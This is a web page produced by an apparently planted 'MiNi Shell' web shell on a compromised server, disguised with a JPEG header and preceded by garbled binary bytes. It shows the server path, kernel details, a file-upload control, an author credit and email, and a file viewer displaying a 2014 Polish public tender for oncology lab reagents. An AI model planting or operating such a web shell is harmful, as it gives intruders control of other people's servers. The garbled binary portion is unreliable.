JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140514/162996-N-2014.html

<p class="kh_header"><b>Gliwice: Sukcesywne dostawy odczynników i materiałów zużywalnych dla Centrum Onkologii - Instytutu im. Marii Skłodowskiej - Curie Oddział w Gliwicach.</b><br>
<b>Numer ogłoszenia: 162996 - 2014; data zamieszczenia: 14.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Onkologii-Instytut im. Marii Skłodowskiej-Curie Oddział w Gliwicach , ul. Wybrzeże Armii Krajowej 15, 44-101 Gliwice, woj. śląskie, tel. 032 2789171, 2789172, 2789193,, faks 032 2789197, 2789198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.io.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy odczynników i materiałów zużywalnych dla Centrum Onkologii - Instytutu im. Marii Skłodowskiej - Curie Oddział w Gliwicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy odczynników i materiałów zużywalnych dla Centrum Onkologii - Instytutu im. Marii Skłodowskiej - Curie Oddział w Gliwicach, w tym:
- zadanie nr 1: Odczynniki  do hodowli komórkowej, - zadanie nr 2: Zestaw do różnicowania  komórek mezynchymalnych, - zadanie nr 3: Odczynniki i materiały do cytometrii przepływowej,- zadanie nr 4: Zestawy ELISA
- zadanie nr 5: Przeciwciała i bufory do cytometrii - zadanie nr 6: Przeciwciało anty-HSF1- zadanie nr 7: Końcówka do pipet automatycznych 100-1000 ul
- zadanie nr 8: Fibronektyna - zadanie nr 9: Medium hodowlane MCDB153
- zadanie nr 10: Probówki do bankowania komórek - zadanie nr 11: Materiały zużywalne do hodowli komórkowej - płytki 96 dołkowe - zadanie nr 12:  Odczynniki do  izolacji RNA - zadanie nr 13:  Materiały zużywalne do Western Blottingu - zadanie nr 14:  Papier fotograficzny- zadanie nr 15:  Plastiki laboratoryjne - zadanie nr 16:  Końcówka do pipet - zadanie nr 17:  Enzymy restrykcyjne- zadanie nr 18:  Enzymy restrykcyjne   - zadania nr 19:  Enzymy restrykcyjne   - zadanie nr 20: Enzym restrykcyjny PstI    - zadanie nr 21: Naklejki do opisywania probówek - zadanie nr 22: Odczynnik do dekontaminacji  DNA i nukleaz - zadanie nr 23:  Markery DNA - zadanie nr 24: Taśma do kontroli sterylizacji  - zadanie nr 25:  Zestaw papieru fotograficznego i taśm barwiących do drukarki Canon   - zadanie nr 26:  Plastiki laboratoryjne  - zadanie nr 27:  Końcówki do pipet 1-200ul - zadanie nr 28:  Probówki PP  - zadanie nr 29:  Polimeraza  - zadanie nr 30:  Zestaw do real-time PCR z EvaGreen  - zadanie nr 31:  Waga laboratoryjna- zadanie nr 32:  Butelki do hodowli komórkowej  - zadanie nr 33:  Plastik laboratoryjny - zadanie nr 34:  Polimeraza- zadanie nr 35:  Termostabilna polimeraza DNA do PCR typu hot-start- zadanie nr 36:  Odczynniki chemiczne podstawowe- zadanie nr 37:  Alkohol etylowy 95% (spirytus rektyfikowany) - zadanie nr 38:  Materiały plastikowe jednorazowego użytku- zadanie nr 39:  Przeciwciała- zadanie nr 40:  Pipetor- zadanie nr 41:  Kulki magnetyczne do immunoprecypitacji- zadanie nr 42:  Kolumny i odczynniki do izolacji DNA i RNA  - zadanie nr 43:  Tris, Chlorek sodu, akcesoria laboratoryjne - zadanie nr 44:  Końcówki do pipet z filtrem i płytki 6-dołkowe do hodowli - zadanie nr 45:  Startery do syntezy cDNA  - zadanie nr 46:  Roztwór BSA i klisze fotograficzne do Wester-blot  - zadanie nr 47:  Odczynniki do hodowli komórkowej, Western-blot, izolacji  
i przechowywania białek, Mocznik, Fosforan sodu -  zadanie nr 48: Pasza i ściółka dla myszy laboratoryjnych - zadanie nr 49:  Płyn do mycia klatek myszy laboratoryjnych - zadanie nr 50:  Elisa i DAPI - zadanie nr 51: Noże (żyletki ) do kriostatu  - zadanie nr 52: Odczynniki do histohemii   - zadanie nr 53: Szkiełka podstawowe i nakrywkowe- zadanie nr 54: Końcówka ze złożem C18  i próbówki z filtrem 50 Da  - zadanie nr 55: Akcesoria do mikroskopii  - zadanie nr 56: Zestaw do izolacji DNA - zadanie nr 57: Pipeta automatyczna  - zadanie nr 58: Końcówka ZipTip i microcony - zadanie nr 59: Jednorazowe materiały laboratoryjne  - zadanie nr 60: Materiały laboratoryjne - zadanie nr 61: Odczynniki chemiczne  - zadanie nr 62: Zestaw do oznaczania cytotoksyczności   - zadanie nr 63: Materiały eksploatacyjne do hodowli komórek  - zadanie nr 64: Płytki do hodowli 3D  - zadanie nr 65: Polimeraza, zestawy odczynnikowe, markery wielkości- zadanie nr 66: Odczynniki laboratoryjne   - zadanie nr 67: Materiały eksploatacyjne do hodowli komórek  - zadanie nr 68: Przeciwciało - zadanie nr 69: Jednorazowe materiały laboratoryjne  - zadanie nr 70: Zestawy odczynnikowe   - zadanie nr 71: Akcesoria do chromatografii nLC  - zadanie nr 72: Akcesoria do chromatografii mlc -  cz. 2   - zadanie nr 73: Jednorazowe materiały laboratoryjne i pipeta automatyczna  - zadanie nr 74: Fiolki  zakręcane z insertami  - zadanie nr 75: Kolumna i akcesoria  - zadanie nr 76: Jednorazowe materiały laboratoryjne  - zadanie nr 77: Prekolumna.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.70.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 77.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu przetargowym Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać oświadczenie o spełnianiu przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy Pzp. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać oświadczenie o spełnianiu przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy Pzp. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać oświadczenie o spełnianiu przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy Pzp. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać oświadczenie o spełnianiu przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy Pzp. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać oświadczenie o spełnianiu przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy Pzp. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W celu potwierdzenia, że oferowane produkty odpowiadają wymaganiom określonym przez Zamawiającego oferta musi zawierać w zakresie: -zadania nr 5 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt.  - zadania nr 7 - wymaga się złożenia próbki opisanej w sposób umożliwiający pełną identyfikację produktu  tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także nazwę Wykonawcy - w ilości co najmniej 1 szt.  
- zadania nr 10 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt.  - zadania nr 11 odpowiada wymaganiom określonym przez Zamawiającego wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt.  - zadania nr 15 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości  co najmniej 1 szt.  - zadania nr 16  - wymaga się złożenia  próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt.  - zadania nr 26 - odpowiada wymaganiom określonym przez Zamawiającego wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt. - zadania nr 27 - wymaga się złożenia próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt. - zadania nr 28 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt.   - zadania nr 30 - wymaga się złożenia dla pozycji nr 1 opisu zaoferowanego produktu umożliwiającego pełną identyfikację produktu. Dokumenty, o którym mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem - przez Wykonawcę.- zadania nr 32 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości  co najmniej 1 szt. Ponadto należy dołączyć do oferty opis zaoferowanego produktu (ulotkę), certyfikat czystości pod względem RNaz i DNaz. Dokumenty, o których mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność  z oryginałem - przez Wykonawcę,- zadania nr 33 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy -w ilości 1 pełnego opakowania handlowego z etykietą z numerem katalogowym. Ponadto należy dołączyć do oferty  certyfikat czystości dla każdej zaoferowanego produktu (dot. wszystkich pozycji). Dokumenty, o których mowa należy złożyć  w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem - przez Wykonawcę,- zadania nr 34 - wymaga się złożenia próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt. Ponadto należy dołączyć do oferty ulotkę opisującą zaoferowany produkt wskazująca na datę ważności produktu oraz certyfikat czystości a także certyfikat autoryzacji zaoferowanego produktu Dokumenty, o których mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem - przez Wykonawcę,
- zadania nr 35 - odpowiada wymaganiom określonym przez Zamawiającego wymaga się dołączyć do oferty oświadczenie producenta  o właściwościach specjalnego odczynnika  do amplifikacji matryc bogatych w pary GC, 
że nie zawiera DMSO. Ponadto należy dołączyć dokument potwierdzający, że Wykonawca oferujący polimerazę DNA do PCR typu hot-start jest  certyfikowanym przedstawicielem producenta. Dodatkowo od oferty należy dołączyć oryginalną specyfikację techniczną zaoferowanego odczynnika od producenta.- zadania nr  38 - wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy -  w ilości co najmniej 1 opakowania  handlowego. - zadania nr 71 - należy dołączyć do oferty opis zaoferowanego produktu wraz z folderem dla poz. od nr 1  do nr 6. Dokumenty, o których mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem - przez Wykonawcę. 
- zadania nr 73 należy dołączyć do oferty opis zaoferowanego produktu wraz z folderem dla poz. od nr 1  do nr 5. Dokumenty, o których mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność  z oryginałem - przez Wykonawcę. - zadania nr 75 należy dołączyć do oferty opis zaoferowanego produktu wraz z folderem dla poz. nr 1 i nr 2. Dokumenty, o których mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem - przez Wykonawcę. - zadania nr 76 wymaga się złożenia dla każdej pozycji próbki opisanej w sposób umożliwiający pełną identyfikację produktu tj. nr zadania, nr pozycji z zadania, nazwę producenta, a także należy podać nazwę Wykonawcy - w ilości co najmniej 1 szt.  Ponadto należy dołączyć do oferty opis zaoferowanego produktu (folder). Dokumenty, o których mowa należy złożyć w formie oryginału lub kserokopii poświadczonej - za zgodność z oryginałem - przez Wykonawcę. 2. Pełnomocnictwo do podpisania oferty i załączników, o ile prawo do reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą.  3. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - stosowne pełnomocnictwo dla pełnomocnika Wykonawców.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( możliwość składania jednej oferty przez dwa lub więcej podmiotów) żaden z Wykonawców ( oddzielnie) nie może podlegać wykluczeniu z postępowania. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 musi złożyć w ofercie każdy z Wykonawców Konsorcjum. W przypadku dokumentów potwierdzających spełnienie warunków udziału z art. 22 ust. 1 Ustawy Pzp wystarczy, że dokumenty potwierdzające spełnienie warunków złoży co najmniej jeden z jej uczestników oferty wspólnej lub gdy z dokumentów złożonych przez tych wykonawców łącznie będzie wynikać ich spełnienie. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (zwani dalej Konsorcjum) powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w rozdziale III.4 niniejszego ogłoszenia. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 Ustawy Pzp.). Pełnomocnictwo musi być załączone do oferty w formie oryginału, kopii poświadczonej za zgodność z oryginałem - zgodnie z przepisami K.C. Pełnomocnictwo może być udzielone w szczególności: 1) łącznie przez wszystkich Wykonawców (jeden dokument), 2) oddzielnie przez każdego z nich (tyle dokumentów ile Wykonawców). Wszelka korespondencja prowadzona będzie z Pełnomocnikiem Konsorcjum jeżeli załączone pełnomocnictwo nie będzie wskazywało inaczej. Wykonawcy wspólne ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu umowę regulującą współpracę tych wykonawców. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Nie dopuszcza się składania umowy przedwstępnej Konsorcjum lub umowy zawartej pod warunkiem zawieszającym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający z inicjatywy własnej lub Wykonawcy dopuszcza zmiany w umowie w następujących przypadkach:
2.1 zmiany:
a)  jakości (na wyższą) zaoferowanych produktów, przy zachowaniu lub obniżeniu ceny jednostkowej,
b)   wielkości opak. zbiorczego zaoferowanego produktu przy zachowaniu lub obniżeniu ceny jednostkowej,
c)   numeru katalogowego produktu,
d)   nazewnictwa produktu. 
e)  produktu objętego umową na nowy - w przypadku zaprzestania produkcji produktu objętego umową przez producenta  i wprowadzenia przez tego producenta nowego produktu, o parametrach jakościowych nie gorszych od parametrów produktu wycofanego z rynku, przy zachowaniu lub obniżeniu ceny produktu wycofanego. 
2.2. możliwość skorygowania ceny brutto na podstawie stosownego dokumentu, zarówno na rzecz Wykonawcy
jak i  Zamawiającego w przypadku zmian przepisów o podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.io.gliwice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Onkologii - Instytut im. Marii Skłodowskiej - Curie Oddział w Gliwicach, ul. Wybrzeże Armii Krajowej 15, w Dziale Zamówień Publicznych i Zaopatrzenia ( pok. 2.002 )...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 09:30, miejsce: Centrum Onkologii - Instytut im. Marii Skłodowskiej - Curie Oddział w Gliwicach, ul. Wybrzeże Armii Krajowej 15, w Dziale Zamówień Publicznych i Zaopatrzenia ( pok. 2.002 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Znak niniejszej sprawy: DO/DZ-381-1-54/14.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com